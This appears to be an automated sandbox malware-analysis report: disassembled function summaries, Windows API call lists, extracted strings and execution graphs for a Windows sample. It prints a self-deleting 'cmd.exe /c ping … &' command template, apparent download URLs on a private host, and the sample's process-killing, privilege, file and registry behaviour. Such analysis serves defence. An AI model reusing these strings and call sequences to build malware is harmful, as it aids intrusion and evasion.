                                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040130A
                                                • Sleep.KERNEL32(00000064), ref: 00401321
                                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00401331
                                                • Sleep.KERNEL32(00000064), ref: 00401339
                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00401349
                                                • CloseHandle.KERNEL32(00000000), ref: 00401350
                                                • __p___argv.MSVCRT ref: 0040137D
                                                • wsprintfA.USER32 ref: 0040139A
                                                • WinExec.KERNEL32(?,00000000), ref: 004013AD
                                                • Sleep.KERNEL32(000001F4,?,?,?,?,00000000,?), ref: 004013B8
                                                • ExitProcess.KERNEL32 ref: 004013BC
                                                Strings
                                                • cmd.exe /c ping 127.0.0.1 -n 2&%s "%s", xrefs: 00401394
                                                • c:\%s.exe, xrefs: 004012DE
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: File$Sleep$__p___argv$CloseCreateHandleWritewsprintf$CountExecExitProcessReadTick
                                                • String ID: c:\%s.exe$cmd.exe /c ping 127.0.0.1 -n 2&%s "%s"
                                                • API String ID: 529022016-1443030469
                                                • Opcode ID: b0d82628c8d42d29bb42b0dbe05b30571f89d42255fb0a6e4ee7a3c0e0fd351b
                                                • Instruction ID: 9f8aa6881b80f391e29a048e327f9647279769309d18573ee161f45e2535dee3
                                                • Opcode Fuzzy Hash: b0d82628c8d42d29bb42b0dbe05b30571f89d42255fb0a6e4ee7a3c0e0fd351b
                                                • Instruction Fuzzy Hash: 2B418171504341AFD310EF64DC45FAB7BA9EFC8704F04093DF245AB2E1DA7496048BAA
                                                Function 00401F00 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 197COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 252 401f00-401f40 CoInitialize call 403f80 255 401f51-401f88 call 403fa0 _mbscmp call 404178 252->255 256 401f42-401f4e 252->256 261 401ff9-402022 call 403fa0 _mbscmp call 404178 255->261 262 401f8a-401f9c call 403060 255->262 256->255 274 402024-40204d call 403fa0 _mbscmp call 404178 261->274 275 40204f-40205e call 403f40 261->275 267 401fcd-401ff7 call 403f80 262->267 268 401f9e-401fc8 call 403f80 262->268 281 402063-402078 CoUninitialize 267->281 268->281 274->275 274->281 275->281 284 40207a-402089 281->284 285 40208d-40209c 281->285 284->285 287 4020c9-4020da 285->287 288 40209e-4020ac 285->288 296 402115-40212a call 403260 287->296 297 4020dc-4020e6 287->297 292 4020b2-4020c6 288->292 293 40215b-402169 288->293 303 402132-40213d 296->303 304 40212c-40212e 296->304 299 4020e8-4020ea 297->299 300 4020ee-4020fc 297->300 299->300 300->293 302 4020fe-402112 300->302 305 402145-402153 303->305 306 40213f-402141 303->306 304->303 305->293 308 402155-402157 305->308 306->305 308->293
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: InitializeUninitialize_mbscmp
                                                • String ID: http://192.168.100.83/$http://192.168.100.83/9.htm$http://192.168.100.83/F.htm
                                                • API String ID: 2492722006-1795800369
                                                • Opcode ID: 35811a6e0b39e4f7b08488aa2c5a3d4eb87b184382bd88b4647af15aedf611d2
                                                • Instruction ID: a67ed12fd00eb966c7ef07626c931287be5c1ca5e9acac2baddc7c0ca8bee009
                                                • Opcode Fuzzy Hash: 35811a6e0b39e4f7b08488aa2c5a3d4eb87b184382bd88b4647af15aedf611d2
                                                • Instruction Fuzzy Hash: F061BE70604302AFD710EF64C989B1BBBA8AF88714F04496DF985EB3D1DB78D905CB96
                                                Function 00402710 Relevance: 12.1, APIs: 8, Instructions: 97windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 00402759
                                                • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00402768
                                                • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 00402785
                                                • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00402794
                                                • SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 004027D0
                                                • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004027DF
                                                • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 004027FC
                                                • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 0040280B
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: acb55e1696818d62f7613b3393379dbb035e1e1f34fcddce67767c826e64d927
                                                • Instruction ID: 43040d4cf96770573546f0ef5553b46f0ed2c3b2f342c278d2bebaaa6e181bda
                                                • Opcode Fuzzy Hash: acb55e1696818d62f7613b3393379dbb035e1e1f34fcddce67767c826e64d927
                                                • Instruction Fuzzy Hash: 6221357178031477EB14AB558CD6F7E365AABD8B10F34422ABF056F2C6CAF4E8018B55
                                                Function 00401C60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetSystemMenu.USER32(?,00000000,?,?,?,?,004047E8,000000FF), ref: 00401C85
                                                • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00401CD2
                                                • AppendMenuA.USER32(?,00000000,00000010,?), ref: 00401CE1
                                                • SendMessageA.USER32(?,00000080,00000001,?), ref: 00401D0D
                                                • SendMessageA.USER32(?,00000080,00000000,?), ref: 00401D21
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: Menu$AppendMessageSend$System
                                                • String ID: http://www.1.com
                                                • API String ID: 62300227-1471656216
                                                • Opcode ID: 8bfcf3e66f0112f36f00dce6af1070b3536336381e515d163b94ad252a9c805a
                                                • Instruction ID: 014e3ba470a9a3624742ceba51641722d59a2d0febe7554dbc01a11c7d6f2640
                                                • Opcode Fuzzy Hash: 8bfcf3e66f0112f36f00dce6af1070b3536336381e515d163b94ad252a9c805a
                                                • Instruction Fuzzy Hash: 142192B53447017BE220EB65CC86F5BB3A8FB88B50F10462DB6556B2D1CBB9F800CB59
                                                Function 00403D20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: _mbscmp
                                                • String ID: user.ini
                                                • API String ID: 2888065108-1338118170
                                                • Opcode ID: f68a4b7512e58f0b074adbafbc15d7738ed7276c7fa3a7cd18c7a8ce536ae287
                                                • Instruction ID: 7586933d42d8af5822a5c6cc992a2378d2c9300e52b0bfec7b5886e4e50d1dbd
                                                • Opcode Fuzzy Hash: f68a4b7512e58f0b074adbafbc15d7738ed7276c7fa3a7cd18c7a8ce536ae287
                                                • Instruction Fuzzy Hash: F341D1B16483406BC314FF55CC42BAF7654AFD0709F40067EFA06762C1DB7C69088AAB
                                                Function 00402F00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53memorystringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 399 402f00-402f11 VariantClear 400 402f13-402f18 399->400 401 402f1b-402f25 399->401 400->401 402 402f27-402f29 401->402 403 402f2b-402f5b lstrlen call 4043b0 MultiByteToWideChar 401->403 404 402f5e-402f6a SysAllocString 402->404 403->404 407 402f7c-402f85 404->407 408 402f6c-402f6e 404->408 408->407 409 402f70-402f75 408->409 409->407
                                                APIs
                                                • VariantClear.OLEAUT32(?), ref: 00402F09
                                                • lstrlen.KERNEL32(00402DDC,?,00402DDC,00407194), ref: 00402F2C
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00402DDC,000000FF,?,00000001,?,00402DDC,00407194), ref: 00402F55
                                                • SysAllocString.OLEAUT32(00000000), ref: 00402F5F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: AllocByteCharClearMultiStringVariantWidelstrlen
                                                • String ID: NULL
                                                • API String ID: 3257503732-324932091
                                                • Opcode ID: 2c32c68fdb7f477cd471d25b524953c9b06913d1421e61b9c9fbc39c3ea53eac
                                                • Instruction ID: d48dc8f015bb9ad4e3fe3b606f75ade0cd382acbba87cbd38ab65ded183ca584
                                                • Opcode Fuzzy Hash: 2c32c68fdb7f477cd471d25b524953c9b06913d1421e61b9c9fbc39c3ea53eac
                                                • Instruction Fuzzy Hash: 9801D272600616ABC7105F52CD84B5BBBB8EF413A4F108136FE04B7390E3B898018BE9
                                                Function 004010C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • ekimhuqcroanflvzgdjtxypswb, xrefs: 004010CB
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: rand$CountTicksrand
                                                • String ID: ekimhuqcroanflvzgdjtxypswb
                                                • API String ID: 3923125369-3762667353
                                                • Opcode ID: af64965fe20426d731e7306a6c52b6f3676ca0dad364db7fcac0bb6fbcf8137a
                                                • Instruction ID: b437bbb5ddae58e17e7d4b32f079fbf535bad8d5f4727950ce3f72a2bcf890de
                                                • Opcode Fuzzy Hash: af64965fe20426d731e7306a6c52b6f3676ca0dad364db7fcac0bb6fbcf8137a
                                                • Instruction Fuzzy Hash: 34F04436B052004BC204AA2D9D40A6FF797EBC8351F85043EFE89E3352C976980846BA
                                                Function 00403B10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 149fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: fclosefopenfprintf
                                                • String ID: user.ini
                                                • API String ID: 167258513-1338118170
                                                • Opcode ID: a6a6fb629337a14a19167b81d9b5a2f6b5228c5787a28112ea1f94429918bd96
                                                • Instruction ID: 013291e13a0706baa31a3bd6034cca8677a8dde525ade2333a9cb0047f89d752
                                                • Opcode Fuzzy Hash: a6a6fb629337a14a19167b81d9b5a2f6b5228c5787a28112ea1f94429918bd96
                                                • Instruction Fuzzy Hash: 2C51D7716483809BD310EB15C845F9BBBE4AFD5718F04096EFA85732C1DB7DA504CA6B
                                                Function 00403060 Relevance: 6.2, APIs: 4, Instructions: 176COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: ClearFreeStringVariant
                                                • String ID:
                                                • API String ID: 1438600931-0
                                                • Opcode ID: 36ddf7c9e64948429ea50c594583730548552646f732539940beb09dbb1102c1
                                                • Instruction ID: 37251e203aaafb338411583485349c6a70529d6897f4196c911f470311200aa0
                                                • Opcode Fuzzy Hash: 36ddf7c9e64948429ea50c594583730548552646f732539940beb09dbb1102c1
                                                • Instruction Fuzzy Hash: 8D6110B46083818FC300DFA8C884A1AFBE8BF89704F508D6EF89597350C779E949CB56
                                                Function 004036D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 167windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00403762
                                                • SendMessageA.USER32(?,00000143,00000000,?), ref: 00403896
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: user.ini
                                                • API String ID: 3850602802-1338118170
                                                • Opcode ID: e2a0c54cd5d71bfe7c8f7115dbcc982c8ab97f2cc07cf54eacd2f770ea5d7972
                                                • Instruction ID: 54062048f7d8e9c3c5b10c10d2f13be0a112b8bce1456f32d0f06b7dcf1a2bd7
                                                • Opcode Fuzzy Hash: e2a0c54cd5d71bfe7c8f7115dbcc982c8ab97f2cc07cf54eacd2f770ea5d7972
                                                • Instruction Fuzzy Hash: 8151C6F1508341AFC314EB22C856F5F7BE8ABD5B48F004A2DF655662C1DB789608CBA7
                                                Function 00402170 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 167windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00402202
                                                • SendMessageA.USER32(?,00000143,00000000,?), ref: 00402336
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: user.ini
                                                • API String ID: 3850602802-1338118170
                                                • Opcode ID: 37e4858ff997d67b506cbc70ba22a13177efcd1f51f67c78ac5313dcec2c17d1
                                                • Instruction ID: afaa56c09f8307c61a21e81d60edd19e1058136c3d77b862272b9fbdbc9fbc74
                                                • Opcode Fuzzy Hash: 37e4858ff997d67b506cbc70ba22a13177efcd1f51f67c78ac5313dcec2c17d1
                                                • Instruction Fuzzy Hash: 9E51E9B1508341AFC304EB62C856F5F7BE8ABD5748F400A2DFA55662C1DB789608CBA7

                                                Execution Graph

                                                Execution Coverage:11%
                                                Dynamic/Decrypted Code Coverage:1.3%
                                                Signature Coverage:19.2%
                                                Total number of Nodes:959
                                                Total number of Limit Nodes:27
                                                execution_graph 6424 1000841c 6425 1000841f RegCloseKey 6424->6425 6462 1000b037 6463 1000b040 6462->6463 6464 1000b04b 6CEE2C70 6463->6464 6465 1000b054 6463->6465 6464->6465 6466 10011036 ??1type_info@@UAE 6467 10011045 6CEE2C70 6466->6467 6468 1001104c 6466->6468 6467->6468 6505 10011859 6510 100118a2 6505->6510 6508 10011868 6CEE2C70 6509 1001186f 6508->6509 6511 100118b2 6510->6511 6512 10011861 6511->6512 6513 100118bf LocalFree 6511->6513 6512->6508 6512->6509 6513->6512 6546 10001470 6547 10001480 LoadLibraryA 6546->6547 6586 10011498 6587 100114a4 6586->6587 6589 10011a56 6587->6589 6590 10011ab4 6589->6590 6591 10011af9 LoadLibraryA 6590->6591 6592 10011bc7 6590->6592 6593 10011b49 InterlockedExchange 6590->6593 6595 10011b6b 6590->6595 6591->6593 6594 10011b08 GetLastError 6591->6594 6592->6587 6599 10011b57 6593->6599 6600 10011b7d FreeLibrary 6593->6600 6597 10011b28 RaiseException 6594->6597 6598 10011b1a 6594->6598 6595->6592 6596 10011bdb GetProcAddress 6595->6596 6596->6592 6602 10011beb GetLastError 6596->6602 6597->6592 6598->6593 6598->6597 6599->6595 6601 10011b5d LocalAlloc 6599->6601 6600->6595 6601->6595 6603 10011bfd 6602->6603 6603->6592 6604 10011c0b RaiseException 6603->6604 6604->6592 5376 100014a0 5377 100014b0 LoadLibraryA 5376->5377 6855 10010150 6858 10010170 6855->6858 6857 10010165 6859 100101e9 6858->6859 6861 1001017f 6858->6861 6860 100101f0 ReadFile 6859->6860 6859->6861 6860->6861 6861->6857 6893 10001170 6894 10001180 6893->6894 6895 10001000 2 API calls 6894->6895 6896 1000118a 6895->6896 5378 10002580 5379 10002590 5378->5379 5382 10001000 5379->5382 5381 1000259a GetProcAddress 5384 1000102c 5382->5384 5383 1000114e lstrcpy 6CEE2C70 5383->5381 5384->5383 6943 10005990 6944 10005995 6943->6944 6947 10010feb 6944->6947 6950 10010fbf 6947->6950 6949 100059ba 6951 10010fd4 __dllonexit 6950->6951 6952 10010fc8 _onexit 6950->6952 6951->6949 6952->6949 7038 100059d0 7039 100059d5 7038->7039 7040 10010feb 2 API calls 7039->7040 7041 100059fa 7040->7041 6369 1001121c 6370 10011238 6369->6370 6372 1001122f 6369->6372 6370->6372 6376 10011260 6370->6376 6377 10011171 6370->6377 6373 10011280 6372->6373 6374 10011171 3 API calls 6372->6374 6372->6376 6375 10011171 3 API calls 6373->6375 6373->6376 6374->6373 6375->6376 6378 10011179 6377->6378 6379 100111af 6378->6379 6380 100111d9 6378->6380 6381 1001119a malloc 6378->6381 6379->6372 6380->6379 6383 10011206 free 6380->6383 6381->6379 6382 100111b3 _initterm 6381->6382 6382->6379 6383->6379 7139 1000821f 7140 1000825a wsprintfA 7139->7140 7141 1000822d 7139->7141 7142 10008288 lstrlen 7140->7142 7141->7140 7143 1000823e 7141->7143 7144 100082a7 wsprintfA 7142->7144 7145 100082de 7144->7145 7146 100082e2 _CxxThrowException 7145->7146 7147 100082f7 SetLastError 7145->7147 7146->7147 7149 10008326 _CxxThrowException 7147->7149 7150 1000833b RegCloseKey RegOpenKeyExA 7147->7150 7149->7150 7151 100083b0 SetLastError 7150->7151 7152 1000839b _CxxThrowException 7150->7152 7154 10008405 RegCloseKey 7151->7154 7155 100083d8 _CxxThrowException 7151->7155 7152->7151 7156 10008415 7154->7156 7157 100083f4 7155->7157 7158 100083ff 7155->7158 7160 1000841f RegCloseKey 7156->7160 7157->7158 7159 100083f9 GetLastError 7157->7159 7159->7158 5387 10002640 5388 10002650 5387->5388 5389 10001000 2 API calls 5388->5389 5390 1000265a GetProcAddress 5389->5390 7278 10011672 7283 1001167c 7278->7283 7281 10010feb 2 API calls 7282 10011698 7281->7282 7286 10011799 7283->7286 7287 100117a8 7286->7287 7288 10011677 7286->7288 7287->7288 7289 100117f5 _CxxThrowException 7287->7289 7288->7281 7289->7288 7304 1000be80 6CEE2C70 7388 100112cc 7389 100112d8 7388->7389 7390 10011a56 9 API calls 7389->7390 7391 100112e2 7390->7391 7426 10007eeb RegCloseKey RegCloseKey 7451 100112fe 7452 1001130a 7451->7452 7453 10011a56 9 API calls 7452->7453 7453->7452 5391 1000bb20 5449 10006a50 7 API calls 5391->5449 5394 1000bb53 CreateMutexA GetLastError 5397 1000bb74 5394->5397 5398 1000bdff wsprintfA 5394->5398 5395 1000bb3c GetCurrentProcessId 5486 10004ff0 OpenProcess 5395->5486 5397->5398 5400 1000bb7d 5397->5400 5402 1000be39 5398->5402 5399 1000bb48 ExitProcess 5453 10004f60 GetCurrentProcess OpenProcessToken 5400->5453 5404 1000be45 Sleep DeleteFileA 5402->5404 5405 1000be57 5402->5405 5403 1000bb89 5457 10004a10 PathFileExistsA 5403->5457 5404->5405 5407 1000bb9a 5408 1000bc45 CreateThread Sleep 5407->5408 5458 100051b0 LoadLibraryA GetProcAddress GetExtendedUdpTable 5407->5458 5409 1000bcf4 WSAStartup CreateThread CreateThread Sleep 5408->5409 5410 1000bc6d 5408->5410 5740 10009230 5408->5740 5473 10006bf0 GetVersionExA 5409->5473 5729 10008dc0 WSAStartup 5409->5729 5735 1000b5e0 5409->5735 5412 10001000 2 API calls 5410->5412 5415 1000bc77 5412->5415 5414 1000bbb2 5417 1000bbc8 5414->5417 5418 1000bbba 5414->5418 5421 10001000 2 API calls 5415->5421 5416 1000bd59 5422 1000bd61 CreateThread 5416->5422 5423 1000bd72 CreateThread Sleep CreateThread 5416->5423 5469 10004b40 CreateFileA 5417->5469 5491 10005030 5418->5491 5427 1000bca3 5421->5427 5422->5423 5680 100094e0 5422->5680 5476 1000b8e0 5423->5476 5650 1000b6a0 GetSystemDirectoryA GetSystemDirectoryA 5423->5650 5663 100055e0 9 API calls 5423->5663 5425 1000bbc5 5425->5417 5426 1000bbe4 5470 10004a80 SetFilePointer 5426->5470 5430 10001000 2 API calls 5427->5430 5428 1000bda0 CreateThread Sleep 5481 10005180 5428->5481 5706 10009240 5428->5706 5433 1000bccf 5430->5433 5432 1000bbf2 5471 10004a50 CloseHandle 5432->5471 5433->5409 5436 1000bdc1 Sleep CreateThread 5437 1000bdd9 Sleep CreateThread Sleep 5436->5437 5696 10008cf0 5436->5696 5439 1000bdf6 Sleep 5437->5439 5690 1000b9b0 5437->5690 5438 1000bbf8 5472 10004a10 PathFileExistsA 5438->5472 5439->5439 5441 1000bc02 5442 1000bc23 5441->5442 5443 1000bc09 5441->5443 5445 1000bc3c 5442->5445 5446 1000bc2e Sleep DeleteFileA 5442->5446 5505 100049c0 ShellExecuteA 5443->5505 5445->5408 5506 100090e0 strstr 5445->5506 5446->5445 5447 1000bc20 5447->5442 5450 10006b1b 5449->5450 5451 10006b35 PathFileExistsA 5450->5451 5520 1000c100 5450->5520 5451->5394 5451->5395 5454 10004fe4 5453->5454 5455 10004f7b LookupPrivilegeValueA 5453->5455 5454->5403 5455->5454 5456 10004f91 AdjustTokenPrivileges CloseHandle 5455->5456 5456->5403 5457->5407 5459 10005205 malloc 5458->5459 5460 100051f7 5458->5460 5462 10005222 GetExtendedUdpTable 5459->5462 5463 10005219 5459->5463 5460->5459 5461 100051fc 5460->5461 5461->5414 5464 10005236 5462->5464 5467 1000523e 5462->5467 5463->5414 5464->5414 5465 10005279 free FreeLibrary 5465->5414 5466 1000524f htons 5466->5467 5468 1000526c 5466->5468 5467->5465 5467->5466 5467->5468 5468->5465 5469->5426 5470->5432 5471->5438 5472->5441 5475 10006c44 sprintf 5473->5475 5475->5416 5477 10001000 2 API calls 5476->5477 5478 1000b939 5477->5478 5545 1000a9f0 5478->5545 5480 1000b947 wsprintfA DeleteFileA wsprintfA DeleteFileA DeleteFileA 5480->5428 5482 10001000 2 API calls 5481->5482 5483 1000518b 5482->5483 5610 10004ca0 RegOpenKeyExA 5483->5610 5485 100051a2 5485->5436 5485->5437 5487 10005009 TerminateProcess 5486->5487 5488 1000502a 5486->5488 5489 10005024 CloseHandle 5487->5489 5490 10005017 CloseHandle 5487->5490 5488->5399 5489->5488 5490->5399 5492 1000504c 5491->5492 5493 10005050 5492->5493 5494 10005069 GetCurrentProcessId 5492->5494 5611 10004da0 5493->5611 5496 10005093 5494->5496 5497 1000507a 5494->5497 5500 10004ff0 4 API calls 5496->5500 5499 10004da0 11 API calls 5497->5499 5501 10005086 5499->5501 5502 1000509a 6 API calls 5500->5502 5501->5425 5503 100050e1 GetTickCount wsprintfA MoveFileExA 5502->5503 5504 1000511b 5502->5504 5503->5504 5504->5425 5505->5447 5507 10009208 5506->5507 5509 10009116 5506->5509 5507->5408 5508 1000913d 5511 10006bf0 2 API calls 5508->5511 5509->5508 5510 1000c100 11 API calls 5509->5510 5510->5508 5512 1000919a 5511->5512 5513 10004920 wvsprintfA 5512->5513 5514 100091d6 5513->5514 5619 10008f30 5514->5619 5517 10004920 wvsprintfA 5518 100091fb 5517->5518 5625 10007580 5518->5625 5525 1000c230 sprintf CreateFileA 5520->5525 5522 1000c11e 5523 1000c129 5522->5523 5535 1000c3e0 Netbios 5522->5535 5523->5451 5526 1000c280 DeviceIoControl GetLastError FormatMessageA 5525->5526 5527 1000c273 5525->5527 5528 1000c2d8 5526->5528 5529 1000c2c8 5526->5529 5527->5522 5544 1000c160 DeviceIoControl 5528->5544 5529->5522 5531 1000c305 5532 1000c319 CloseHandle 5531->5532 5533 1000c309 5531->5533 5534 1000c333 5532->5534 5533->5522 5534->5522 5536 1000c42c 5535->5536 5537 1000c43f 5535->5537 5536->5523 5538 1000c449 Netbios 5537->5538 5539 1000c48e Netbios 5537->5539 5542 1000c477 5537->5542 5538->5537 5538->5539 5540 1000c4f0 5539->5540 5541 1000c503 sprintf 5539->5541 5540->5523 5541->5523 5542->5539 5543 1000c47b 5542->5543 5543->5523 5544->5531 5591 10004ca0 RegOpenKeyExA 5545->5591 5547 1000aa61 5548 1000aa80 5547->5548 5549 1000aa68 5547->5549 5553 1000acc1 5548->5553 5554 1000aba2 5548->5554 5555 1000adc6 5548->5555 5556 1000ab07 5548->5556 5557 1000ade9 5548->5557 5558 1000ad4a 5548->5558 5559 1000ad8d 5548->5559 5560 1000aa8f 5548->5560 5561 1000abf1 5548->5561 5562 1000ad85 5548->5562 5563 1000aa9f 5548->5563 5580 1000ac24 5548->5580 5589 1000aac6 5548->5589 5592 1000ae31 5549->5592 5551 1000ae31 RegCloseKey 5552 1000aa7b 5551->5552 5552->5480 5605 10004bf0 RegEnumValueA 5553->5605 5599 10004c70 RegQueryValueExA 5554->5599 5573 10001000 2 API calls 5555->5573 5598 10004c70 RegQueryValueExA 5556->5598 5564 10001000 2 API calls 5557->5564 5577 10001000 2 API calls 5558->5577 5571 10001000 2 API calls 5559->5571 5560->5554 5560->5555 